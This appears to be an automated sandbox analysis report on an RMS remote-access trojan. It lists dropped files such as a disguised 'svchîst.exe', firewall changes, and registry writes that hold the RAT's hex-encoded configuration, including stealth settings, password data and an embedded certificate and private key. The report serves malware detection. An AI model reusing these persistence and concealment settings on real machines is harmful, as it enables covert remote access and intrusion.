Malware Analysis Report

2024-11-13 16:21

Sample ID 220508-erqe2sfbd3
Target 59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322
SHA256 59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322
Tags
rms discovery evasion rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322

Threat Level: Known bad

The file 59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322 was found to be: Known bad.

Malicious Activity Summary

rms discovery evasion rat trojan

RMS

Modifies Windows Firewall

Executes dropped EXE

Drops file in Drivers directory

Loads dropped DLL

Checks computer location settings

Checks installed software on the system

Drops file in System32 directory

Program crash

Enumerates physical storage devices

Modifies registry class

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-05-08 04:10

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-05-08 04:10

Reported

2022-05-08 05:59

Platform

win7-20220414-en

Max time kernel

175s

Max time network

204s

Command Line

"C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe"

Signatures

RMS

trojan rat rms

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\libeay32.dll C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe N/A

Modifies Windows Firewall

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\attrib.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e747275653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe" C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223639313130223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c465645645954464a55515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c4a484f58525a563278315355633161474a585657646a4d3278365a45645764456c49546d786a626c70775933704661553144515564424d5656465158643357677053527a6c305756647364556c484e5768695631566e597a4e73656d5248566e524a534535735932356163474e3651575647647a4235545770424d5531455a33644f5646557a5457704359555a334d48704e616b4578436b31455658644f5646557a545770435955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73525749794d576868567a526e596d314764467054516e6f4b5a56684f4d4670584d47646a4d6c5a355a473173656b31545358644a51566c45566c465252455243624556694d6a466f595663305a324a74526e526155304a365a56684f4d4670584d47646a4d6c5a355a4731736567704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a307444515646465158424d633164615179746f56454e57516a49345448524f5455526f436b78306158637264323530566c567257546b3461326378626d6f725a6a513462544135545641315a6c63336158424251577372634868514d6d4d31556c70574d4739694c33426b635574754e6b4a33544578334e31554b526e4670566b646963546461635870305132316f6257747051565a4d566a6779526b4a36526b643352303834534842365758684259335a5565556c3161553555626e6c4b6132646163484e6c63305a59616a51785151707957454a4f6257513361476c6b55554d76555652724f4456525255524e655859325a474630626a4e365269393564325a534d5559724f457078536a684f63325976635656314f546b32635534764e326b3053466879436b46304e465676646b3157646b55344b7a5a71635568424e586854526b46456447704f614764364c31687754337052556d523556444a5657586c79535578494f454e4b626a4e4d55464252536e6b795447704f5748514b5157314e576e6c4e4d567048565556715a46517a5655684564466472536c55724f55746d54336433526d316a526c4e50566a557a4d324a755432526b52533948546e5a354c32704251586c61595852365555646d4b77704564306c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b465251553433596d706b52555632556a424b64484a764d5642426244644c4f4735724e6d3544617a6772436b597a4d6d686f656b564b62565234526b6c694e6c684c4e476f355a6c526854314e614f58493161467034636b6443513264525a4452584d3342745a57497855324e30566d6847524646774e6c5a46615734765432344b57484d7764477033525567354e6e5231596a52795257744a636b6848636d5643646a557a6330527a5931704a53585a55546c413255474d7753316f72576d743461484e734d6c4655536b35504f56703157445636625170514e6b3952547a56705a57687253475177626e467664555a75646d645a5932747a516c4248566c417965456470523070694e6d39354e5864574d6b6b7752466c5057566c6f556c646c536e46594d57347651575246436d5254563246724d6b77784d6c4234556d744f656c564f556e645154586f326130777854575576526d5678546e6b304d6e5a76563235754e55394e5a5770555756466a646c4e31536d6455556b7833575755346430734b5331524a56574531646e6453645856724e5774354e446c365157744e546b52474f555a52633168495a6a6b3461474a314b3064695656524f54465134536e553253565230575564464d30554b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a535556325a306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746e6432646e553274425a3056425157394a516b4652513274316546707254445a47545570565347494b643355774d486450525855795445513351325578566c4e53616a4e35553052585a5641314c327035596c5177647939734f574a315332744251315132626b5576576e7073526d7859553268324b3277796233466d6277704951584e32524852525633464b56567031636e5274636b38775332464859564e4a516c56305748705a5655684e56574a42575464335a57354f616b564365546c5153576b32535446505a6b6c7455304a7462586732436e64575a56427156554e3059305579576a4e3152306f7851557735516b3955656d784255553136537939774d5845795a6d5a4e5743394d516a6c495656673364323176626e63796543387263464d334d7a4e78627a4d4b4c33564d5a32526c63304d7a61464e704f4868584f4652364e33465062324e45626b5a4a565546504d6b3079523052514f5756724e303543526a4e4b55467053616b747a5a334e6d64306c745a6d4e7a4f446c426267704d5758564e4d57557751316c34626b6c36566d746155564e4f4d56426b55574e504d574652624651334d4841344e30524256317033566b6b315747356d5a48566a4e5445775644685a4d69394d4b30314252457073436e457a546b46614c7a52515157644e516b464252554e6e5a305642523270684c3246484c7938335a6e4e694d453575616b677a636a4a4863485259516d3932597a4e684e6b5a4d4e6b567a4c317053516d63315255674b54446433644774754d6c70504e4574524e564271643370775457687355566c7261577036597a6452613152545532517856454e69517a637864326c615a6d4a4854466f7262455a51646e46496356524856325a4e526770356433564e4c32704264314d726347646f525739715230745a55316f765530704e556b4e79516a687153557849655841334d6d746b4b334a315a4652695a325a465a587052525538784c3252615a43395657444e69436e5a4e595339615a327470656939326556465764546334616c463253335242644446516348704a574531556345357a617974586330526f5a6b4a464e6b687054336c6d62323953534530305547705955464279636d494b626c5a74526a466a5456466d626a4e7863325a504e6b5a6a6256466e4d46703263485a5a55456c4862576457656c4e6d53325a6d6245356a5669744a565646465431464361693931624534314b7a453253544e4759777076596c4a78526b4a5362324a364d6d744764306c46597a4e53625570324e5463785a5773314d557030566b5a594c314e7365445a555431464c516d6452524649345257566a527a4e314f557476526c493251326c50436e6b30646c5931656e6c6a5132566f63564655566d4e7a54314a325357355054475a304f484a486547457a52446c6f56585a594d5849725a555a5462477857556d46544d544a72556d684a4d334a465748704c5256494b6146705a4f4774555a457461576b394a51564e536332646165473034636e5672643368524e32557a636b46594e47705263546477655464335245316a6347564a513063345245566b546e6c4a4c3052744d6e68535541706d52554e524e555a3463444a46574852425646705752456c776457466c52577050643074435a31464553544d31626c4577544530315a456c33597a4a50546e644d64446b356158673354324d33654373314e444e44436c4a724d7a5935556a525255565257634546745453393055466447624441344f5852735a6d52346245397456306c50536d686e4d32356856444e4e53573479513356435956563251306471636e70565a5442565454454b54485a305458426c61555a69553352495231557a5754457a55336c574d4734305158643365475631626d46794e5446476143737a515668614e6c42444f544661616d773362564e4d5457316b53577030524842504e417033544764744f5746334e31425253304a6e5555524f5a584e485456464d575735484e454a4364546c775a57745662456836636b5a69516b7850554852464d56686a54325a5751584e4b567a5a6153476b335a6e565a436e41315131563153474e59516c4a6c5430783361456c354e47397a4c7a5a366256426b616c5a7a4d3341724d30394c52566331626d7059626b6b344e33567353584a794f544e594b303569557a4e714d555578527a6b4b52573954624864554b31687454326c5054586c68646d686162584653626e5251646a49765a47524f576a4e545a56567253797335636e6869643052566257787a595859335a6c425351316779643074435a30566e53517045636b3559637a4d774f54683155304a555a3164365a56566a5a5852556546705062466855625642364e6d7433623156455a56524e5646646d54476c4856316334576d647553336b304e55526e593274465232744f436c46775744464e566c56365758647863484931536b7070655752764d48704f54556f72546c644d55304e4e5331646b556a68365133526b6155497a656c686c5a4863795756566a556e70366133524d53475a6a59554d4b6546465961537459626b7379535734315432705959306850527a6c59615770455248707959586c4755585a494e5739334e30314e546b467652304a425332527161586c784f444672555546455455307952576c435241704d6431526a5430356a4f4764564c3252585a3168325358524d63574a42645656796355464252465a686446704561465177566b7071546a647a5269395362485935626a4e704d5374735458524c6255523054305642436d684962544e44566d6c4b596b4e55556e4a57637a493356306c7657454a72597974475a45737663326c3265584a3565586c345a304e325748526e52464a4461556332567a4279656d3173646b395054337070656c6b4b64335a7465544d7a62474a705a3030794d544e614d6e5a4e57453542636a6473436930744c533074525535454946425353565a42564555675330565a4c5330744c53304b3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings = fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600390031003100300022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00 C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3132332d3537382d3637352d3832303c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e66616c73653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
